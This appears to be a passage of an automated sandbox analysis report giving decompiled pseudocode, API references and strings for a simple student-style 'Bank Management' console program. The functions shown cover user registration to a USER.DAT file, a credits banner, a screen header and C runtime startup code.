					E012B6DB6(_t73, _t83, _t84, __eflags);
					_t90 = _t89 + 4;
					__eflags = _v12;
					if(__eflags == 0) {
						E012B12B0(0x19, 0xa);
						_push("Password         : ");
						E012B715C(_t73, _t83, _t84, __eflags);
						E012B12F0(_t83, _t84,  &_v76);
						E012B12B0(0x19, 0xc);
						_push("Confirm Password : ");
						E012B715C(_t73, _t83, _t84, __eflags);
						_t74 =  &_v44;
						E012B12F0(_t83, _t84,  &_v44);
						_t53 = E012B8230(0x12d2f02,  &_v44);
						_t85 = _t90 + 0x10;
						__eflags = _t53;
						if(__eflags != 0) {
							E012B20E0( &_v44, _t83, _t84, __eflags, _t103);
							E012B12B0(0xa, 0xa);
							_push(0x12cf444);
							E012B715C(_t73, _t83, _t84, __eflags);
							_t85 = _t85 + 4;
							_t67 = _v8 + 1;
							__eflags = _t67;
							_v8 = _t67;
						}
					} else {
						E012B12B0(0xa, 0xa);
						_push(0x12cf3e0);
						E012B715C(_t73, _t83, _t84, __eflags);
						_t85 = _t90 + 4;
						_v8 = _v8 + 1;
					}
					__eflags = _v8;
				} while (__eflags != 0);
				 *0x12d2f28 = E012B6EF1("USER.DAT", 0x12cf474);
				_t76 =  *0x12d2f28; // 0x0
				_push(_t76);
				E012B6DB6(_t73, _t83, _t84, __eflags);
				 *0x12d2f28 = E012B6EF1("USER.DAT", "a");
				_push(0x12d2f02);
				_push(0x12d2ee4);
				_push(0x12d2ee0);
				_push("%s %s %s\n");
				_t79 =  *0x12d2f28; // 0x0
				_push(_t79);
				E012B6F06(_t73, _t83, _t84, __eflags);
				_t58 =  *0x12d2f28; // 0x0
				_push(_t58);
				E012B6DB6(_t73, _t83, _t84, __eflags);
				E012B20E0(_t76, _t83, _t84, __eflags, _t103);
				E012B12B0(0x19, 0xa);
				_push("Record ADDED successfully!");
				return E012B715C(_t73, _t83, _t84, __eflags);
			}

0x012b25c0
0x012b25c0
0x012b25c0
0x012b25c0
0x012b25c9
0x012b25d0
0x012b25d7
0x012b25dd
0x012b25e0
0x012b25e3
0x012b25e6
0x012b25e9
0x012b25ec
0x012b25ef
0x012b25f2
0x012b25f5
0x012b25f9
0x012b25fb
0x012b25fe
0x012b2601
0x012b2604
0x012b2607
0x012b260a
0x012b260d
0x012b2610
0x012b2613
0x012b2613
0x012b2618
0x012b2623
0x012b2628
0x012b262d
0x012b263f
0x012b2651
0x012b2656
0x012b2659
0x012b265e
0x012b2665
0x012b266b
0x012b266f
0x012b267a
0x012b2681
0x012b2686
0x012b268c
0x00000000
0x00000000
0x012b2697
0x012b269c
0x012b26a1
0x012b26a9
0x012b26a9
0x012b26ac
0x012b26ae
0x012b26ae
0x012b26b4
0x012b26b5
0x012b26ba
0x012b26bd
0x012b26c1
0x012b26e8
0x012b26ed
0x012b26f2
0x012b26fe
0x012b2707
0x012b270c
0x012b2711
0x012b2719
0x012b271d
0x012b272b
0x012b2730
0x012b2733
0x012b2735
0x012b2737
0x012b2740
0x012b2745
0x012b274a
0x012b274f
0x012b2755
0x012b2755
0x012b2758
0x012b2758
0x012b26c3
0x012b26c7
0x012b26cc
0x012b26d1
0x012b26d6
0x012b26df
0x012b26df
0x012b275b
0x012b275b
0x012b2777
0x012b277c
0x012b2782
0x012b2783
0x012b279d
0x012b27a2
0x012b27a7
0x012b27ac
0x012b27b1
0x012b27b6
0x012b27bc
0x012b27bd
0x012b27c5
0x012b27ca
0x012b27cb
0x012b27d3
0x012b27dc
0x012b27e1
0x012b27f1

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B262D
_wscanf.LIBCMT ref: 012B263F

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B2681

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_wprintf.LIBCMT ref: 012B26D1
_wprintf.LIBCMT ref: 012B26F2
_wprintf.LIBCMT ref: 012B2711
_wprintf.LIBCMT ref: 012B274A
_fprintf.LIBCMT ref: 012B27BD
_wprintf.LIBCMT ref: 012B27E6

Strings

Record ADDED successfully!, xrefs: 012B27E1
User Name : , xrefs: 012B2628
%s %s %s, xrefs: 012B27B1
USER.DAT, xrefs: 012B2790
USER.DAT, xrefs: 012B276A
USER.DAT, xrefs: 012B264C
Confirm Password : , xrefs: 012B270C
%s %s %s, xrefs: 012B2675
Password : , xrefs: 012B26ED

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
API String ID: 3917209068-3252730458
Opcode ID: 0a2be336f17e0735959aa3c8891117f14767667f11b9d1cbb5f447c1de227352
Instruction ID: 1c10ff2d7775b7bb153e5200b1c0af3bc5a12ea69a07725f996d8d5331b0b8c8
Opcode Fuzzy Hash: 0a2be336f17e0735959aa3c8891117f14767667f11b9d1cbb5f447c1de227352
Instruction Fuzzy Hash: AA51C3B1E70306EFDB14EFA4ED82BED7671AF25B84F04456DE604B2280E6B062548766

Uniqueness

Uniqueness Score: -1.00%

Function 012B21E0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E012B21E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* __ebp;
				void* _t28;
				intOrPtr _t31;
				void* _t34;
				void* _t35;
				void* _t36;

				_t33 = __esi;
				_t32 = __edi;
				E012B1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E012B12B0(0x1b, 4);
				_push("BANK MANAGEMENT //");
				E012B715C(_t28, __edi, __esi, __eflags);
				_t35 = _t34 + 4;
				E012B12B0(0x19, 5);
				_v8 = 0;
				while(1) {
					_t42 = _v8 - 0x1b;
					if(_v8 >= 0x1b) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E012B715C(_t28, _t32, _t33, _t42);
					_t35 = _t35 + 8;
					_v8 = _v8 + 1;
				}
				E012B12B0(0x19, 8);
				_push("Designed and Programmed by:");
				E012B715C(_t28, _t32, _t33, __eflags);
				_t36 = _t35 + 4;
				E012B12B0(0x19, 9);
				_v8 = 0;
				while(1) {
					__eflags = _v8 - 0x1b;
					if(__eflags >= 0) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E012B715C(_t28, _t32, _t33, __eflags);
					_t36 = _t36 + 8;
					_t31 = _v8 + 1;
					__eflags = _t31;
					_v8 = _t31;
				}
				E012B12B0(0x21, 0xb);
				_push("Ravi Agrawal");
				E012B715C(_t28, _t32, _t33, __eflags);
				E012B12B0(0x21, 0xd);
				_push("Sagar Sharma");
				E012B715C(_t28, _t32, _t33, __eflags);
				E012B12B0(0x21, 0xf);
				_push("Sawal Maskey");
				E012B715C(_t28, _t32, _t33, __eflags);
				E012B12B0(0x18, 0x14);
				_push("Press Any key to continue...");
				return E012B715C(_t28, _t32, _t33, __eflags);
			}

0x012b21e0
0x012b21e0
0x012b21ec
0x012b21f5
0x012b21fa
0x012b21ff
0x012b2204
0x012b220b
0x012b2210
0x012b2222
0x012b2222
0x012b2226
0x00000000
0x00000000
0x012b2228
0x012b222d
0x012b2232
0x012b2237
0x012b221f
0x012b221f
0x012b2240
0x012b2245
0x012b224a
0x012b224f
0x012b2256
0x012b225b
0x012b226d
0x012b226d
0x012b2271
0x00000000
0x00000000
0x012b2273
0x012b2278
0x012b227d
0x012b2282
0x012b2267
0x012b2267
0x012b226a
0x012b226a
0x012b228b
0x012b2290
0x012b2295
0x012b22a1
0x012b22a6
0x012b22ab
0x012b22b7
0x012b22bc
0x012b22c1
0x012b22cd
0x012b22d2
0x012b22e2

APIs

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B21FF
_wprintf.LIBCMT ref: 012B2232

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B224A
_wprintf.LIBCMT ref: 012B227D
_wprintf.LIBCMT ref: 012B2295
_wprintf.LIBCMT ref: 012B22AB
_wprintf.LIBCMT ref: 012B22C1
_wprintf.LIBCMT ref: 012B22D7

Strings

Designed and Programmed by:, xrefs: 012B2245
Sawal Maskey, xrefs: 012B22BC
Ravi Agrawal, xrefs: 012B2290
Sagar Sharma, xrefs: 012B22A6
BANK MANAGEMENT //, xrefs: 012B21FA
Press Any key to continue..., xrefs: 012B22D2

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
API String ID: 1778593935-2888666035
Opcode ID: addb6cd2c5e792c2a91be8345898017bc3f4b4b2d646bd283625f8cab28d6239
Instruction ID: 934515244b517b4a70a4acc0a8a2504008daff2db19f4757498953b38f096412
Opcode Fuzzy Hash: addb6cd2c5e792c2a91be8345898017bc3f4b4b2d646bd283625f8cab28d6239
Instruction Fuzzy Hash: 2C2160B0AB0306B6FB197BE46D93FEA71215B61FC4F010228FB05792C2E9F1261452A7

Uniqueness

Uniqueness Score: -1.00%

Function 012B20E0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E012B20E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				void* __ebp;
				void* _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t37;

				_t37 = __fp0;
				_t23 = __esi;
				_t22 = __edi;
				E012B1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E012B12B0(0x19, 1);
				_push("Banking Management //");
				E012B715C(_t20, __edi, __esi, __eflags);
				E012B12B0(5, 3);
				_t9 = E012B8230(0x12d2ee4, "Admin");
				_t26 = _t24 + 0xc;
				if(_t9 == 0) {
					 *0x12d2240 = 1;
				}
				_t34 =  *0x12d2240;
				if( *0x12d2240 == 0) {
					_push(0x12d2ee4);
					_push("Current User : %s");
					E012B715C(_t20, _t22, _t23, __eflags);
					_t27 = _t26 + 8;
				} else {
					_push("Current User : Admin");
					E012B715C(_t20, _t22, _t23, _t34);
					_t27 = _t26 + 4;
				}
				_push("\t\t\t\tDate : ");
				E012B715C(_t20, _t22, _t23, _t34);
				E012B834B(_t34, 0x12d2f40);
				_push(0x12d2f40);
				E012B16A0(_t22, _t23, _t37);
				_push(0x12d2f40);
				_push("%s");
				E012B715C(_t20, _t22, _t23, _t34);
				E012B834B(_t34, 0x12d2f40);
				_t31 = _t27 + 0x14;
				_t16 = E012B12B0(1, 5);
				_v8 = 0;
				while(1) {
					_t35 = _v8 - 0x4e;
					if(_v8 >= 0x4e) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E012B715C(_t20, _t22, _t23, _t35);
					_t31 = _t31 + 8;
					_t16 = _v8 + 1;
					_v8 = _t16;
				}
				return _t16;
			}

0x012b20e0
0x012b20e0
0x012b20e0
0x012b20ec
0x012b20f5
0x012b20fa
0x012b20ff
0x012b210b
0x012b211a
0x012b211f
0x012b2124
0x012b2126
0x012b2126
0x012b2130
0x012b2137
0x012b2148
0x012b214d
0x012b2152
0x012b2157
0x012b2139
0x012b2139
0x012b213e
0x012b2143
0x012b2143
0x012b215a
0x012b215f
0x012b216c
0x012b2174
0x012b2179
0x012b217e
0x012b2183
0x012b2188
0x012b2195
0x012b219a
0x012b21a1
0x012b21a6
0x012b21b8
0x012b21b8
0x012b21bc
0x00000000
0x00000000
0x012b21be
0x012b21c3
0x012b21c8
0x012b21cd
0x012b21b2
0x012b21b5
0x012b21b5
0x012b21d5

APIs

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B20FF
_wprintf.LIBCMT ref: 012B213E
_wprintf.LIBCMT ref: 012B2152

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B215F
__wstrtime.LIBCMT ref: 012B216C
_wprintf.LIBCMT ref: 012B2188
__wstrtime.LIBCMT ref: 012B2195
_wprintf.LIBCMT ref: 012B21C8

Strings

N, xrefs: 012B21B8
Banking Management //, xrefs: 012B20FA
Current User : Admin, xrefs: 012B2139
Current User : %s, xrefs: 012B214D
Admin, xrefs: 012B2110
Date : , xrefs: 012B215A

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
API String ID: 3817360410-644830535
Opcode ID: d6a1b32d8c7a9f353faecb17ea1228a6dbac50dbb9e46fd4a34820d3113dc890
Instruction ID: 9a4b2a2d5535589cada9b91be97fa0df1d1d37f5a471650b1a785be17e8ab7de
Opcode Fuzzy Hash: d6a1b32d8c7a9f353faecb17ea1228a6dbac50dbb9e46fd4a34820d3113dc890
Instruction Fuzzy Hash: 74114FB0EF0302FAE7187BA1EC87FE931159B31B86F040168FA08352D2E5E13654426B

Uniqueness

Uniqueness Score: -1.00%

Function 012BA5E2, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012BA5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				void* _t86;
				long _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t160;

				_push(0x64);
				_push(0x12cd8c0);
				E012B9160(__ebx, __edi, __esi);
				E012BBE5F(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				_t160 =  *0x12d2f60 - _t130; // 0x0
				if(_t160 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E012BC55B();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					__eflags = _t134;
					if(_t134 != 0) {
						 *0x12d2f60 = _t81;
						 *0x12d2f5c = _t141;
						while(1) {
							__eflags = _t134 - _t81 + 0x800;
							if(_t134 >= _t81 + 0x800) {
								break;
							}
							 *((short*)(_t134 + 4)) = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							 *(_t134 + 8) = _t130;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
							 *((short*)(_t134 + 0x25)) = 0xa0a;
							 *(_t134 + 0x38) = _t130;
							 *(_t134 + 0x34) = _t130;
							_t134 = _t134 + 0x40;
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x12d2f60; // 0x0
						}
						GetStartupInfoW(_t155 - 0x74);
						__eflags =  *((short*)(_t155 - 0x42));
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								__eflags = _t130 - 3;
								if(_t130 >= 3) {
									break;
								}
								_t147 = (_t130 << 6) +  *0x12d2f60;
								 *(_t155 - 0x24) = _t147;
								__eflags =  *_t147 - 0xffffffff;
								if( *_t147 == 0xffffffff) {
									L35:
									_t147[1] = 0x81;
									__eflags = _t130;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
										__eflags = _t90;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									__eflags = _t142 - 0xffffffff;
									if(_t142 == 0xffffffff) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x12d3064;
										__eflags = _t94;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										__eflags = _t142;
										if(_t142 == 0) {
											goto L47;
										}
										_t98 = GetFileType(_t142);
										__eflags = _t98;
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										__eflags = _t99 - 2;
										if(_t99 != 2) {
											__eflags = _t99 - 3;
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -19738452
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												L49:
												_t130 = _t130 + 1;
												continue;
											}
											_t103 = _t147[1] | 0x00000008;
											__eflags = _t103;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								}
								__eflags =  *_t147 - 0xfffffffe;
								if( *_t147 == 0xfffffffe) {
									goto L35;
								}
								_t147[1] = _t147[1] | 0x00000080;
								goto L49;
							}
							 *(_t155 - 4) = 0xfffffffe;
							E012BA8A6();
							L2:
							_t86 = 1;
							L3:
							return E012B91A5(_t86);
						}
						_t105 =  *(_t155 - 0x40);
						__eflags = _t105;
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *(_t155 - 0x1c) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						__eflags = _t135 - 0x800;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *(_t155 - 0x1c) = 0x800;
						}
						_t149 = 1;
						__eflags = 1;
						 *(_t155 - 0x30) = 1;
						while(1) {
							__eflags =  *0x12d2f5c - _t135; // 0x3
							if(__eflags >= 0) {
								break;
							}
							_t138 = E012BC55B(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							__eflags = _t138;
							if(_t138 != 0) {
								0x12d2f60[_t149] = _t138;
								 *0x12d2f5c =  *0x12d2f5c + _t141;
								__eflags =  *0x12d2f5c;
								while(1) {
									__eflags = _t138 - 0x12d2f60[_t149] + 0x800;
									if(_t138 >= 0x12d2f60[_t149] + 0x800) {
										break;
									}
									 *((short*)(_t138 + 4)) = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									 *(_t138 + 8) = _t130;
									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
									 *((short*)(_t138 + 0x25)) = 0xa0a;
									 *(_t138 + 0x38) = _t130;
									 *(_t138 + 0x34) = _t130;
									_t138 = _t138 + 0x40;
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *(_t155 - 0x1c);
								continue;
							}
							_t135 =  *0x12d2f5c; // 0x3
							 *(_t155 - 0x1c) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(1) {
							__eflags = _t143 - _t135;
							if(_t143 >= _t135) {
								goto L31;
							}
							_t150 =  *_t139;
							__eflags = _t150 - 0xffffffff;
							if(_t150 == 0xffffffff) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							}
							__eflags = _t150 - 0xfffffffe;
							if(_t150 == 0xfffffffe) {
								goto L26;
							}
							_t111 =  *_t109;
							__eflags = _t111 & 0x00000001;
							if((_t111 & 0x00000001) == 0) {
								goto L26;
							}
							__eflags = _t111 & 0x00000008;
							if((_t111 & 0x00000008) != 0) {
								L24:
								_t154 = ((_t143 & 0x0000001f) << 6) + 0x12d2f60[_t143 >> 5];
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
								_t38 = _t154 + 0xc; // 0xd
								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
								_t39 = _t154 + 8;
								 *_t39 =  *(_t154 + 8) + 1;
								__eflags =  *_t39;
								_t139 =  *(_t155 - 0x20);
								L25:
								_t135 =  *(_t155 - 0x1c);
								goto L26;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L25;
							}
							goto L24;
						}
						goto L31;
					}
					E012B96F0(_t155, 0x12d1380, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E012B96F0(_t155, 0x12d1380, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x012ba5e2
0x012ba5e4
0x012ba5e9
0x012ba5f0
0x012ba5f6
0x012ba5f8
0x012ba5fb
0x012ba601
0x012ba621
0x012ba625
0x012ba626
0x012ba627
0x012ba62e
0x012ba630
0x012ba633
0x012ba635
0x012ba64e
0x012ba653
0x012ba659
0x012ba65e
0x012ba660
0x00000000
0x00000000
0x012ba662
0x012ba668
0x012ba66b
0x012ba66e
0x012ba677
0x012ba67a
0x012ba680
0x012ba683
0x012ba686
0x012ba689
0x012ba68c
0x012ba68c
0x012ba697
0x012ba69d
0x012ba6a2
0x012ba7d1
0x012ba7d1
0x012ba7d1
0x012ba7d4
0x012ba7d7
0x00000000
0x00000000
0x012ba7e2
0x012ba7e8
0x012ba7eb
0x012ba7ee
0x012ba803
0x012ba803
0x012ba807
0x012ba809
0x012ba810
0x012ba815
0x012ba817
0x012ba817
0x012ba80b
0x012ba80d
0x012ba80d
0x012ba821
0x012ba823
0x012ba826
0x012ba86d
0x012ba873
0x012ba876
0x012ba87c
0x012ba881
0x012ba883
0x012ba888
0x012ba888
0x00000000
0x012ba828
0x012ba828
0x012ba82a
0x00000000
0x00000000
0x012ba82d
0x012ba833
0x012ba835
0x00000000
0x00000000
0x012ba837
0x012ba839
0x012ba83e
0x012ba841
0x012ba84b
0x012ba84e
0x012ba859
0x012ba85e
0x012ba862
0x012ba868
0x012ba88f
0x012ba88f
0x00000000
0x012ba88f
0x012ba854
0x012ba854
0x012ba856
0x012ba856
0x00000000
0x012ba856
0x012ba847
0x00000000
0x012ba847
0x012ba826
0x012ba7f0
0x012ba7f3
0x00000000
0x00000000
0x012ba7fb
0x00000000
0x012ba7fb
0x012ba895
0x012ba89c
0x012ba616
0x012ba618
0x012ba619
0x012ba61e
0x012ba61e
0x012ba6a8
0x012ba6ab
0x012ba6ad
0x00000000
0x00000000
0x012ba6b3
0x012ba6b5
0x012ba6b8
0x012ba6bb
0x012ba6c0
0x012ba6c8
0x012ba6ca
0x012ba6cc
0x012ba6ce
0x012ba6ce
0x012ba6d3
0x012ba6d3
0x012ba6d4
0x012ba6d7
0x012ba6d7
0x012ba6dd
0x00000000
0x00000000
0x012ba6e9
0x012ba6eb
0x012ba6ee
0x012ba6f0
0x012ba784
0x012ba78b
0x012ba78b
0x012ba791
0x012ba79d
0x012ba79f
0x00000000
0x00000000
0x012ba7a1
0x012ba7a7
0x012ba7aa
0x012ba7ad
0x012ba7b1
0x012ba7b7
0x012ba7ba
0x012ba7bd
0x012ba7c0
0x012ba7c0
0x012ba7c5
0x012ba7c6
0x012ba7c9
0x00000000
0x012ba7c9
0x012ba6f6
0x012ba6fc
0x00000000
0x012ba6fc
0x012ba6ff
0x012ba701
0x012ba704
0x012ba707
0x012ba70a
0x012ba70a
0x012ba70c
0x00000000
0x00000000
0x012ba712
0x012ba714
0x012ba717
0x012ba771
0x012ba771
0x012ba772
0x012ba778
0x012ba779
0x012ba77c
0x012ba77f
0x00000000
0x012ba77f
0x012ba719
0x012ba71c
0x00000000
0x00000000
0x012ba71e
0x012ba720
0x012ba722
0x00000000
0x00000000
0x012ba724
0x012ba726
0x012ba736
0x012ba743
0x012ba74a
0x012ba74f
0x012ba756
0x012ba75e
0x012ba762
0x012ba768
0x012ba768
0x012ba768
0x012ba76b
0x012ba76e
0x012ba76e
0x00000000
0x012ba76e
0x012ba729
0x012ba72f
0x012ba732
0x012ba734
0x00000000
0x00000000
0x00000000
0x012ba734
0x00000000
0x012ba70a
0x012ba642
0x012ba64a
0x00000000
0x012ba64a
0x012ba60e
0x00000000

APIs

__lock.LIBCMT ref: 012BA5F0

Part of subcall function 012BBE5F: __mtinitlocknum.LIBCMT ref: 012BBE71
Part of subcall function 012BBE5F: EnterCriticalSection.KERNEL32(?,?,012BD668,0000000D,?,?,?,?,012CDA28,00000008,012BD601,00000000,00000000,012B8F04,012C1E56,00000000), ref: 012BBE8A

@_EH4_CallFilterFunc@8.LIBCMT ref: 012BA60E
__calloc_crt.LIBCMT ref: 012BA627
@_EH4_CallFilterFunc@8.LIBCMT ref: 012BA642
GetStartupInfoW.KERNEL32(?,012CD8C0,00000064), ref: 012BA697
__calloc_crt.LIBCMT ref: 012BA6E2
GetFileType.KERNEL32 ref: 012BA729
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 012BA762
GetStdHandle.KERNEL32(-000000F6), ref: 012BA81B
GetFileType.KERNEL32 ref: 012BA82D
InitializeCriticalSectionAndSpinCount.KERNEL32(-012D2F54,00000FA0), ref: 012BA862

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
String ID:
API String ID: 1456538442-0
